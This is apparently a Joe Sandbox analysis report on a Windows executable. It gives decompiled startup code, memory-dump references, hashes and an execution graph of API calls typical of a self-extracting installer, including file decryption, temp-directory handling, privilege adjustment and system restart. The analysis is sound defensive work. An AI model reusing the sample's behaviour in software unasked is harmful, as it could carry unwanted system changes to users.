                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A69B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0x1a81f8 = E001A6C70();
                                                                                                                                                                                                                                              				__set_app_type(E001A6FBE(2));
                                                                                                                                                                                                                                              				 *0x1a88a4 =  *0x1a88a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0x1a88a8 =  *0x1a88a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0x1a8528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0x1a851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E001A7000();
                                                                                                                                                                                                                                              				if( *0x1a8000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E001A7000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A71EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x001a69b7
                                                                                                                                                                                                                                              0x001a69c2
                                                                                                                                                                                                                                              0x001a69c8
                                                                                                                                                                                                                                              0x001a69cf
                                                                                                                                                                                                                                              0x001a69d8
                                                                                                                                                                                                                                              0x001a69de
                                                                                                                                                                                                                                              0x001a69e4
                                                                                                                                                                                                                                              0x001a69e6
                                                                                                                                                                                                                                              0x001a69ec
                                                                                                                                                                                                                                              0x001a69f2
                                                                                                                                                                                                                                              0x001a69f4
                                                                                                                                                                                                                                              0x001a6a00
                                                                                                                                                                                                                                              0x001a6a07
                                                                                                                                                                                                                                              0x001a6a0d
                                                                                                                                                                                                                                              0x001a6a0e
                                                                                                                                                                                                                                              0x001a6a15

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 001A6FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 001A69C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 001A69D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 001A69E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 001A6A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: 6a1cd0faaf8b1dcb7a3e6d84f9637f59ce2b07a136c92afe292322b6c02c1d48
                                                                                                                                                                                                                                              • Instruction ID: 9f1b121f23a674c310988003aca5e44a771eb182473b500f109db87e01d3a581
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1cd0faaf8b1dcb7a3e6d84f9637f59ce2b07a136c92afe292322b6c02c1d48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F0F8785083018FC759AB30EE0A6047BA1FB17331B51060AE46286AE1CF3A85E1CA11
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:26.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:969
                                                                                                                                                                                                                                              Total number of Limit Nodes:42
                                                                                                                                                                                                                                              execution_graph 3128 a86bef _XcptFilter 2196 a84ca0 GlobalAlloc 2197 a86a60 2214 a87155 2197->2214 2199 a86a65 2200 a86a76 GetStartupInfoW 2199->2200 2201 a86a93 2200->2201 2202 a86aa8 2201->2202 2203 a86aaf Sleep 2201->2203 2204 a86ac7 _amsg_exit 2202->2204 2207 a86ad1 2202->2207 2203->2201 2204->2207 2205 a86b2e __IsNonwritableInCurrentImage 2209 a86bd6 _ismbblead 2205->2209 2210 a86c1e 2205->2210 2213 a86bbe exit 2205->2213 2219 a82bfb GetVersion 2205->2219 2206 a86b13 _initterm 2206->2205 2207->2205 2207->2206 2208 a86af4 2207->2208 2209->2205 2210->2208 2211 a86c27 _cexit 2210->2211 2211->2208 2213->2205 2215 a8717a 2214->2215 2216 a8717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 a871e2 2215->2217 2218 a871cd 2216->2218 2217->2199 2218->2217 2220 a82c0f 2219->2220 2221 a82c50 2219->2221 2220->2221 2222 a82c13 GetModuleHandleW 2220->2222 2236 a82caa memset memset memset 2221->2236 2222->2221 2225 a82c22 GetProcAddress 2222->2225 2225->2221 2233 a82c34 2225->2233 2226 a82c8e 2228 a82c9e 2226->2228 2229 a82c97 CloseHandle 2226->2229 2228->2205 2229->2228 2233->2221 2234 a82c89 2331 a81f90 2234->2331 2348 a8468f FindResourceA SizeofResource 2236->2348 2239 a82e30 2242 a844b9 20 API calls 2239->2242 2240 a82d2d CreateEventA SetEvent 2241 a8468f 7 API calls 2240->2241 2243 a82d57 2241->2243 2244 a82f06 2242->2244 2245 a82d5b 2243->2245 2246 a82d7d 2243->2246 2353 a86ce0 2244->2353 2358 a844b9 2245->2358 2248 a82e1f 2246->2248 2252 a8468f 7 API calls 2246->2252 2387 a85c9e 2248->2387 2250 a82d6e 2250->2244 2255 a82d9f 2252->2255 2253 a82c62 2253->2226 2277 a82f1d 2253->2277 2255->2245 2257 a82da3 CreateMutexA 2255->2257 2256 a82e3a 2258 a82e52 FindResourceA 2256->2258 2259 a82e43 2256->2259 2257->2248 2260 a82dbd GetLastError 2257->2260 2261 a82e6e 2258->2261 2262 a82e64 LoadResource 2258->2262 2413 a82390 2259->2413 2260->2248 2264 a82dca 2260->2264 2261->2250 2428 a836ee GetVersionExA 2261->2428 2262->2261 2265 a82dea 2264->2265 2266 a82dd5 2264->2266 2268 a844b9 20 API calls 2265->2268 2267 a844b9 20 API calls 2266->2267 2269 a82de8 2267->2269 2270 a82dff 2268->2270 2272 a82e04 CloseHandle 2269->2272 2270->2248 2270->2272 2272->2244 2278 a82f6c 2277->2278 2279 a82f3f 2277->2279 2572 a85164 2278->2572 2281 a82f5f 2279->2281 2552 a851e5 2279->2552 2705 a83a3f 2281->2705 2282 a82f71 2314 a83041 2282->2314 2587 a855a0 2282->2587 2289 a86ce0 4 API calls 2291 a82c6b 2289->2291 2290 a82f86 GetSystemDirectoryA 2292 a8658a CharPrevA 2290->2292 2318 a852b6 2291->2318 2293 a82fab LoadLibraryA 2292->2293 2294 a82fc0 GetProcAddress 2293->2294 2295 a82ff7 FreeLibrary 2293->2295 2294->2295 2296 a82fd6 DecryptFileA 2294->2296 2297 a83006 2295->2297 2298 a83017 SetCurrentDirectoryA 2295->2298 2296->2295 2308 a82ff0 2296->2308 2297->2298 2637 a8621e GetWindowsDirectoryA 2297->2637 2299 a83054 2298->2299 2300 a83026 2298->2300 2304 a83061 2299->2304 2648 a83b26 2299->2648 2302 a844b9 20 API calls 2300->2302 2307 a83037 2302->2307 2306 a8307a 2304->2306 2304->2314 2657 a8256d 2304->2657 2311 a83098 2306->2311 2668 a83ba2 2306->2668 2724 a86285 GetLastError 2307->2724 2308->2295 2311->2314 2316 a830af 2311->2316 2314->2289 2726 a84169 2316->2726 2319 a852d6 2318->2319 2325 a85316 2318->2325 2320 a85300 LocalFree LocalFree 2319->2320 2322 a852eb SetFileAttributesA DeleteFileA 2319->2322 2320->2319 2320->2325 2321 a8538c 2324 a86ce0 4 API calls 2321->2324 2322->2320 2323 a85374 2323->2321 3059 a81fe1 2323->3059 2327 a82c72 2324->2327 2325->2323 2328 a8535e SetCurrentDirectoryA 2325->2328 2329 a865e8 4 API calls 2325->2329 2327->2226 2327->2234 2330 a82390 13 API calls 2328->2330 2329->2328 2330->2323 2332 a81f9a 2331->2332 2333 a81f9f 2331->2333 2334 a81ea7 15 API calls 2332->2334 2335 a81fc0 2333->2335 2336 a844b9 20 API calls 2333->2336 2339 a81fd9 2333->2339 2334->2333 2337 a81ee2 GetCurrentProcess OpenProcessToken 2335->2337 2338 a81fcf ExitWindowsEx 2335->2338 2335->2339 2336->2335 2341 a81f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2337->2341 2343 a81f0e 2337->2343 2338->2339 2339->2226 2342 a81f6b ExitWindowsEx 2341->2342 2341->2343 2342->2343 2344 a81f1f 2342->2344 2345 a844b9 20 API calls 2343->2345 2346 a86ce0 4 API calls 2344->2346 2345->2344 2347 a81f8c 2346->2347 2347->2226 2349 a82d1a 2348->2349 2350 a846b6 2348->2350 2349->2239 2349->2240 2350->2349 2351 a846be FindResourceA LoadResource LockResource 2350->2351 2351->2349 2352 a846df memcpy_s FreeResource 2351->2352 2352->2349 2354 a86ce8 2353->2354 2355 a86ceb 2353->2355 2354->2253 2470 a86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2355->2470 2357 a86e26 2357->2253 2359 a8455a 2358->2359 2360 a844fe LoadStringA 2358->2360 2364 a86ce0 4 API calls 2359->2364 2361 a84562 2360->2361 2362 a84527 2360->2362 2367 a845c9 2361->2367 2374 a8457e 2361->2374 2471 a8681f 2362->2471 2366 a84689 2364->2366 2366->2250 2370 a845cd LocalAlloc 2367->2370 2371 a84607 LocalAlloc 2367->2371 2368 a84536 MessageBoxA 2368->2359 2370->2359 2378 a845f3 2370->2378 2371->2359 2373 a845c4 2371->2373 2376 a8462d MessageBeep 2373->2376 2374->2374 2377 a84596 LocalAlloc 2374->2377 2379 a8681f 10 API calls 2376->2379 2377->2359 2380 a845af 2377->2380 2381 a8171e _vsnprintf 2378->2381 2382 a8463b 2379->2382 2488 a8171e 2380->2488 2381->2373 2384 a84645 MessageBoxA LocalFree 2382->2384 2385 a867c9 EnumResourceLanguagesA 2382->2385 2384->2359 2385->2384 2394 a85e17 2387->2394 2410 a85cc3 2387->2410 2388 a85dd0 2392 a85dec GetModuleFileNameA 2388->2392 2388->2394 2389 a86ce0 4 API calls 2391 a82e2c 2389->2391 2390 a85ced CharNextA 2390->2410 2391->2239 2391->2256 2393 a85e0a 2392->2393 2392->2394 2498 a866c8 2393->2498 2394->2389 2396 a86218 2507 a86e2a 2396->2507 2399 a85e36 CharUpperA 2400 a861d0 2399->2400 2399->2410 2401 a844b9 20 API calls 2400->2401 2402 a861e7 2401->2402 2403 a861f0 CloseHandle 2402->2403 2404 a861f7 ExitProcess 2402->2404 2403->2404 2405 a85f9f CharUpperA 2405->2410 2406 a85f59 CompareStringA 2406->2410 2407 a86003 CharUpperA 2407->2410 2408 a85edc CharUpperA 2408->2410 2409 a860a2 CharUpperA 2409->2410 2410->2388 2410->2390 2410->2394 2410->2396 2410->2399 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2411 a8667f IsDBCSLeadByte CharNextA 2410->2411 2503 a8658a 2410->2503 2411->2410 2414 a824cb 2413->2414 2417 a823b9 2413->2417 2415 a86ce0 4 API calls 2414->2415 2416 a824dc 2415->2416 2416->2250 2417->2414 2418 a823e9 FindFirstFileA 2417->2418 2418->2414 2419 a82407 2418->2419 2420 a82479 2419->2420 2421 a82421 lstrcmpA 2419->2421 2422 a824a9 FindNextFileA 2419->2422 2426 a8658a CharPrevA 2419->2426 2427 a82390 5 API calls 2419->2427 2424 a82488 SetFileAttributesA DeleteFileA 2420->2424 2421->2422 2423 a82431 lstrcmpA 2421->2423 2422->2419 2425 a824bd FindClose RemoveDirectoryA 2422->2425 2423->2419 2423->2422 2424->2422 2425->2414 2426->2419 2427->2419 2432 a83737 2428->2432 2434 a8372d 2428->2434 2429 a844b9 20 API calls 2442 a839fc 2429->2442 2430 a86ce0 4 API calls 2431 a82e92 2430->2431 2431->2244 2431->2250 2443 a818a3 2431->2443 2432->2434 2435 a838a4 2432->2435 2432->2442 2514 a828e8 2432->2514 2434->2429 2434->2442 2435->2434 2436 a839c1 MessageBeep 2435->2436 2435->2442 2437 a8681f 10 API calls 2436->2437 2438 a839ce 2437->2438 2439 a839d8 MessageBoxA 2438->2439 2440 a867c9 EnumResourceLanguagesA 2438->2440 2439->2442 2440->2439 2442->2430 2444 a818d5 2443->2444 2449 a819b8 2443->2449 2543 a817ee LoadLibraryA 2444->2543 2446 a86ce0 4 API calls 2448 a819d5 2446->2448 2448->2250 2463 a86517 FindResourceA 2448->2463 2449->2446 2450 a818e5 GetCurrentProcess OpenProcessToken 2450->2449 2451 a81900 GetTokenInformation 2450->2451 2452 a81918 GetLastError 2451->2452 2453 a819aa CloseHandle 2451->2453 2452->2453 2454 a81927 LocalAlloc 2452->2454 2453->2449 2455 a81938 GetTokenInformation 2454->2455 2456 a819a9 2454->2456 2457 a8194e AllocateAndInitializeSid 2455->2457 2458 a819a2 LocalFree 2455->2458 2456->2453 2457->2458 2459 a8196e 2457->2459 2458->2456 2460 a81999 FreeSid 2459->2460 2461 a81975 EqualSid 2459->2461 2462 a8198c 2459->2462 2460->2458 2461->2459 2461->2462 2462->2460 2464 a8656b 2463->2464 2465 a86536 LoadResource 2463->2465 2467 a844b9 20 API calls 2464->2467 2465->2464 2466 a86544 DialogBoxIndirectParamA FreeResource 2465->2466 2466->2464 2468 a8657c 2466->2468 2467->2468 2468->2250 2470->2357 2472 a86857 GetVersionExA 2471->2472 2474 a8691a 2471->2474 2472->2474 2475 a8687c 2472->2475 2473 a86ce0 4 API calls 2476 a8452c 2473->2476 2474->2473 2475->2474 2477 a868a5 GetSystemMetrics 2475->2477 2476->2368 2482 a867c9 2476->2482 2477->2474 2478 a868b5 RegOpenKeyExA 2477->2478 2478->2474 2479 a868d6 RegQueryValueExA RegCloseKey 2478->2479 2479->2474 2480 a8690c 2479->2480 2492 a866f9 2480->2492 2483 a867e2 2482->2483 2486 a86803 2482->2486 2496 a86793 EnumResourceLanguagesA 2483->2496 2485 a867f5 2485->2486 2497 a86793 EnumResourceLanguagesA 2485->2497 2486->2368 2489 a8172d 2488->2489 2490 a8173d _vsnprintf 2489->2490 2491 a8175d 2489->2491 2490->2491 2491->2373 2494 a8670f 2492->2494 2493 a86740 CharNextA 2493->2494 2494->2493 2495 a8674b 2494->2495 2495->2474 2496->2485 2497->2486 2501 a866d5 2498->2501 2499 a866f3 2499->2394 2501->2499 2502 a866e5 CharNextA 2501->2502 2510 a86648 2501->2510 2502->2501 2504 a8659b 2503->2504 2505 a865b8 CharPrevA 2504->2505 2506 a865ab 2504->2506 2505->2506 2506->2410 2513 a86cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 a8621d 2511 a8665d IsDBCSLeadByte 2510->2511 2512 a86668 2510->2512 2511->2512 2512->2501 2513->2509 2515 a82a62 2514->2515 2522 a8290d 2514->2522 2516 a82a6e GlobalFree 2515->2516 2517 a82a75 2515->2517 2516->2517 2517->2435 2519 a82955 GlobalAlloc 2519->2515 2520 a82968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 a82a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 a82a80 GlobalUnlock 2522->2523 2524 a82773 2522->2524 2523->2515 2525 a828b2 2524->2525 2526 a827a3 CharUpperA CharNextA CharNextA 2524->2526 2528 a828b7 GetSystemDirectoryA 2525->2528 2527 a827db 2526->2527 2526->2528 2529 a828a8 GetWindowsDirectoryA 2527->2529 2530 a827e3 2527->2530 2531 a828bf 2528->2531 2529->2531 2535 a8658a CharPrevA 2530->2535 2532 a828d2 2531->2532 2533 a8658a CharPrevA 2531->2533 2534 a86ce0 4 API calls 2532->2534 2533->2532 2536 a828e2 2534->2536 2537 a82810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 a82837 RegQueryValueExA 2537->2538 2539 a8289a RegCloseKey 2538->2539 2540 a8285c 2538->2540 2539->2531 2541 a82867 ExpandEnvironmentStringsA 2540->2541 2542 a8287a 2540->2542 2541->2542 2542->2539 2544 a81890 2543->2544 2545 a81826 GetProcAddress 2543->2545 2546 a86ce0 4 API calls 2544->2546 2547 a81889 FreeLibrary 2545->2547 2548 a81839 AllocateAndInitializeSid 2545->2548 2549 a8189f 2546->2549 2547->2544 2548->2547 2550 a8185f FreeSid 2548->2550 2549->2449 2549->2450 2550->2547 2553 a8468f 7 API calls 2552->2553 2554 a851f9 LocalAlloc 2553->2554 2555 a8522d 2554->2555 2556 a8520d 2554->2556 2558 a8468f 7 API calls 2555->2558 2557 a844b9 20 API calls 2556->2557 2559 a8521e 2557->2559 2560 a8523a 2558->2560 2561 a86285 GetLastError 2559->2561 2562 a8523e 2560->2562 2563 a85262 lstrcmpA 2560->2563 2571 a85223 2561->2571 2566 a844b9 20 API calls 2562->2566 2564 a8527e 2563->2564 2565 a85272 LocalFree 2563->2565 2569 a844b9 20 API calls 2564->2569 2568 a82f4d 2565->2568 2567 a8524f LocalFree 2566->2567 2567->2568 2568->2278 2568->2281 2568->2314 2570 a85290 LocalFree 2569->2570 2570->2571 2571->2568 2573 a8468f 7 API calls 2572->2573 2574 a85175 2573->2574 2575 a8517a 2574->2575 2576 a851af 2574->2576 2577 a844b9 20 API calls 2575->2577 2578 a8468f 7 API calls 2576->2578 2579 a8518d 2577->2579 2580 a851c0 2578->2580 2579->2282 2739 a86298 2580->2739 2584 a851ce 2586 a844b9 20 API calls 2584->2586 2585 a851e1 2585->2282 2586->2579 2588 a8468f 7 API calls 2587->2588 2589 a855c7 LocalAlloc 2588->2589 2590 a855db 2589->2590 2591 a855fd 2589->2591 2592 a844b9 20 API calls 2590->2592 2593 a8468f 7 API calls 2591->2593 2594 a855ec 2592->2594 2595 a8560a 2593->2595 2596 a86285 GetLastError 2594->2596 2597 a8560e 2595->2597 2598 a85632 lstrcmpA 2595->2598 2622 a855f1 2596->2622 2599 a844b9 20 API calls 2597->2599 2600 a8564b LocalFree 2598->2600 2601 a85645 2598->2601 2602 a8561f LocalFree 2599->2602 2603 a8565b 2600->2603 2604 a85696 2600->2604 2601->2600 2625 a855f6 2602->2625 2611 a85467 49 API calls 2603->2611 2605 a8589f 2604->2605 2606 a856ae GetTempPathA 2604->2606 2607 a86517 24 API calls 2605->2607 2609 a856eb 2606->2609 2610 a856c3 2606->2610 2607->2625 2608 a86ce0 4 API calls 2612 a82f7e 2608->2612 2618 a8586c GetWindowsDirectoryA 2609->2618 2619 a85717 GetDriveTypeA 2609->2619 2609->2625 2751 a85467 2610->2751 2614 a85678 2611->2614 2612->2290 2612->2314 2616 a85680 2614->2616 2614->2625 2617 a844b9 20 API calls 2616->2617 2617->2622 2785 a8597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2785 2623 a85730 GetFileAttributesA 2619->2623 2635 a8572b 2619->2635 2622->2625 2623->2635 2625->2608 2626 a85467 49 API calls 2626->2609 2627 a82630 21 API calls 2627->2635 2629 a857c1 GetWindowsDirectoryA 2629->2635 2630 a8597d 34 API calls 2630->2635 2631 a8658a CharPrevA 2632 a857e8 GetFileAttributesA 2631->2632 2633 a857fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 a85827 SetFileAttributesA 2634->2635 2635->2618 2635->2619 2635->2623 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 a85467 49 API calls 2635->2636 2781 a86952 2635->2781 2636->2635 2638 a86268 2637->2638 2639 a86249 2637->2639 2641 a8597d 34 API calls 2638->2641 2640 a844b9 20 API calls 2639->2640 2642 a8625a 2640->2642 2643 a86277 2641->2643 2644 a86285 GetLastError 2642->2644 2645 a86ce0 4 API calls 2643->2645 2646 a8625f 2644->2646 2647 a83013 2645->2647 2646->2643 2647->2298 2647->2314 2649 a83b2d 2648->2649 2649->2649 2650 a83b72 2649->2650 2651 a83b53 2649->2651 2852 a84fe0 2650->2852 2653 a86517 24 API calls 2651->2653 2654 a83b70 2653->2654 2655 a83b7b 2654->2655 2656 a86298 10 API calls 2654->2656 2655->2304 2656->2655 2658 a82622 2657->2658 2659 a82583 2657->2659 2906 a824e0 GetWindowsDirectoryA 2658->2906 2661 a825e8 RegOpenKeyExA 2659->2661 2662 a8258b 2659->2662 2663 a82609 RegQueryInfoKeyA 2661->2663 2664 a825e3 2661->2664 2662->2664 2666 a8259b RegOpenKeyExA 2662->2666 2665 a825d1 RegCloseKey 2663->2665 2664->2306 2665->2664 2666->2664 2667 a825bc RegQueryValueExA 2666->2667 2667->2665 2669 a83bdb 2668->2669 2677 a83bec 2668->2677 2670 a8468f 7 API calls 2669->2670 2670->2677 2671 a83c03 memset 2671->2677 2672 a83d13 2673 a844b9 20 API calls 2672->2673 2701 a83d26 2673->2701 2674 a83f4d 2678 a86ce0 4 API calls 2674->2678 2675 a8468f 7 API calls 2675->2677 2677->2671 2677->2672 2677->2674 2677->2675 2680 a83d7b CompareStringA 2677->2680 2682 a83fab 2677->2682 2685 a83f1e LocalFree 2677->2685 2686 a83f46 LocalFree 2677->2686 2689 a83fd7 2677->2689 2691 a83cc7 CompareStringA 2677->2691 2702 a83e10 2677->2702 2914 a81ae8 2677->2914 2954 a8202a memset memset RegCreateKeyExA 2677->2954 2980 a83fef 2677->2980 2679 a83f60 2678->2679 2679->2311 2680->2677 2680->2689 2684 a844b9 20 API calls 2682->2684 2688 a83fbe LocalFree 2684->2688 2685->2677 2685->2689 2686->2674 2688->2674 2689->2674 3004 a82267 2689->3004 2691->2677 2692 a83e1f GetProcAddress 2695 a83f64 2692->2695 2692->2702 2693 a83f92 2694 a844b9 20 API calls 2693->2694 2696 a83fa9 2694->2696 2697 a844b9 20 API calls 2695->2697 2698 a83f7c LocalFree 2696->2698 2699 a83f75 FreeLibrary 2697->2699 2700 a86285 GetLastError 2698->2700 2699->2698 2700->2701 2701->2674 2702->2692 2702->2693 2703 a83eff FreeLibrary 2702->2703 2704 a83f40 FreeLibrary 2702->2704 2994 a86495 2702->2994 2703->2685 2704->2686 2706 a8468f 7 API calls 2705->2706 2707 a83a55 LocalAlloc 2706->2707 2708 a83a6c 2707->2708 2709 a83a8e 2707->2709 2710 a844b9 20 API calls 2708->2710 2711 a8468f 7 API calls 2709->2711 2712 a83a7d 2710->2712 2713 a83a98 2711->2713 2714 a86285 GetLastError 2712->2714 2715 a83a9c 2713->2715 2716 a83ac5 lstrcmpA 2713->2716 2720 a82f64 2714->2720 2717 a844b9 20 API calls 2715->2717 2718 a83ada 2716->2718 2719 a83b0d LocalFree 2716->2719 2721 a83aad LocalFree 2717->2721 2722 a86517 24 API calls 2718->2722 2719->2720 2720->2278 2720->2314 2721->2720 2723 a83aec LocalFree 2722->2723 2723->2720 2725 a8303c 2724->2725 2725->2314 2727 a8468f 7 API calls 2726->2727 2728 a8417d LocalAlloc 2727->2728 2729 a841a8 2728->2729 2730 a84195 2728->2730 2731 a8468f 7 API calls 2729->2731 2732 a844b9 20 API calls 2730->2732 2734 a841b5 2731->2734 2733 a841a6 2732->2733 2733->2314 2735 a841b9 2734->2735 2736 a841c5 lstrcmpA 2734->2736 2738 a844b9 20 API calls 2735->2738 2736->2735 2737 a841e6 LocalFree 2736->2737 2737->2733 2738->2737 2740 a8171e _vsnprintf 2739->2740 2750 a862c9 FindResourceA 2740->2750 2742 a862cb LoadResource LockResource 2743 a86353 2742->2743 2746 a862e0 2742->2746 2744 a86ce0 4 API calls 2743->2744 2745 a851ca 2744->2745 2745->2584 2745->2585 2747 a8631b FreeResource 2746->2747 2748 a86355 FreeResource 2746->2748 2749 a8171e _vsnprintf 2747->2749 2748->2743 2749->2750 2750->2742 2750->2743 2752 a8548a 2751->2752 2753 a8551a 2751->2753 2812 a853a1 2752->2812 2823 a858c8 2753->2823 2756 a85495 2757 a85581 2756->2757 2762 a8550c 2756->2762 2763 a854c2 GetSystemInfo 2756->2763 2759 a86ce0 4 API calls 2757->2759 2764 a8559a 2759->2764 2760 a8553b CreateDirectoryA 2765 a85577 2760->2765 2766 a85547 2760->2766 2761 a8554d 2761->2757 2769 a8597d 34 API calls 2761->2769 2767 a8658a CharPrevA 2762->2767 2774 a854da 2763->2774 2764->2625 2775 a82630 GetWindowsDirectoryA 2764->2775 2768 a86285 GetLastError 2765->2768 2766->2761 2767->2753 2770 a8557c 2768->2770 2771 a8555c 2769->2771 2770->2757 2771->2757 2773 a85568 RemoveDirectoryA 2771->2773 2772 a8658a CharPrevA 2772->2762 2773->2757 2774->2762 2774->2772 2776 a8265e 2775->2776 2777 a8266f 2775->2777 2778 a844b9 20 API calls 2776->2778 2779 a86ce0 4 API calls 2777->2779 2778->2777 2780 a82687 2779->2780 2780->2609 2780->2626 2782 a8696e GetDiskFreeSpaceA 2781->2782 2783 a869a1 2781->2783 2782->2783 2784 a86989 MulDiv 2782->2784 2783->2635 2784->2783 2786 a859bb 2785->2786 2787 a859dd GetDiskFreeSpaceA 2785->2787 2788 a844b9 20 API calls 2786->2788 2789 a85ba1 memset 2787->2789 2790 a85a21 MulDiv 2787->2790 2791 a859cc 2788->2791 2792 a86285 GetLastError 2789->2792 2790->2789 2793 a85a50 GetVolumeInformationA 2790->2793 2794 a86285 GetLastError 2791->2794 2795 a85bbc GetLastError FormatMessageA 2792->2795 2796 a85a6e memset 2793->2796 2797 a85ab5 SetCurrentDirectoryA 2793->2797 2809 a859d1 2794->2809 2798 a85be3 2795->2798 2799 a86285 GetLastError 2796->2799 2806 a85acc 2797->2806 2801 a844b9 20 API calls 2798->2801 2802 a85a89 GetLastError FormatMessageA 2799->2802 2800 a85b94 2804 a86ce0 4 API calls 2800->2804 2803 a85bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2800 2805 a85c11 2804->2805 2805->2609 2807 a85b0a 2806->2807 2810 a85b20 2806->2810 2808 a844b9 20 API calls 2807->2808 2808->2809 2809->2800 2810->2800 2835 a8268b 2810->2835 2814 a853bf 2812->2814 2813 a8171e _vsnprintf 2813->2814 2814->2813 2815 a8658a CharPrevA 2814->2815 2819 a85415 GetTempFileNameA 2814->2819 2816 a853fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a8544f CreateDirectoryA 2816->2817 2818 a8543a 2817->2818 2817->2819 2821 a86ce0 4 API calls 2818->2821 2819->2818 2820 a85429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 a85449 2821->2822 2822->2756 2824 a858d8 2823->2824 2824->2824 2825 a858df LocalAlloc 2824->2825 2826 a85919 2825->2826 2827 a858f3 2825->2827 2831 a8658a CharPrevA 2826->2831 2828 a844b9 20 API calls 2827->2828 2829 a85906 2828->2829 2830 a86285 GetLastError 2829->2830 2832 a85534 2829->2832 2830->2832 2833 a85931 CreateFileA LocalFree 2831->2833 2832->2760 2832->2761 2833->2829 2834 a8595b CloseHandle GetFileAttributesA 2833->2834 2834->2829 2836 a826b9 2835->2836 2837 a826e5 2835->2837 2839 a8171e _vsnprintf 2836->2839 2838 a826ea 2837->2838 2843 a8271f 2837->2843 2841 a8171e _vsnprintf 2838->2841 2840 a826cc 2839->2840 2844 a844b9 20 API calls 2840->2844 2846 a826fd 2841->2846 2842 a826e3 2845 a86ce0 4 API calls 2842->2845 2843->2842 2847 a8171e _vsnprintf 2843->2847 2844->2842 2848 a8276d 2845->2848 2849 a844b9 20 API calls 2846->2849 2850 a82735 2847->2850 2848->2800 2849->2842 2851 a844b9 20 API calls 2850->2851 2851->2842 2853 a8468f 7 API calls 2852->2853 2854 a84ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a85020 2854->2855 2870 a8515f 2854->2870 2856 a85029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 a85057 2855->2857 2856->2857 2874 a84efd 2857->2874 2860 a85060 2861 a844b9 20 API calls 2860->2861 2862 a85075 2861->2862 2868 a85106 2862->2868 2863 a850e8 2866 a844b9 20 API calls 2863->2866 2864 a8511d 2867 a8513a 2864->2867 2869 a85129 2864->2869 2865 a85110 FreeResource 2865->2864 2866->2862 2867->2870 2872 a8514c SendMessageA 2867->2872 2868->2864 2868->2865 2871 a844b9 20 API calls 2869->2871 2870->2654 2871->2867 2872->2870 2873 a8507c 2873->2863 2873->2868 2876 a84f4a 2874->2876 2875 a84fa1 2878 a86ce0 4 API calls 2875->2878 2876->2875 2882 a84980 2876->2882 2879 a84fc6 2878->2879 2879->2860 2879->2873 2883 a84990 2882->2883 2884 a849c2 lstrcmpA 2883->2884 2885 a849a5 2883->2885 2887 a84a0e 2884->2887 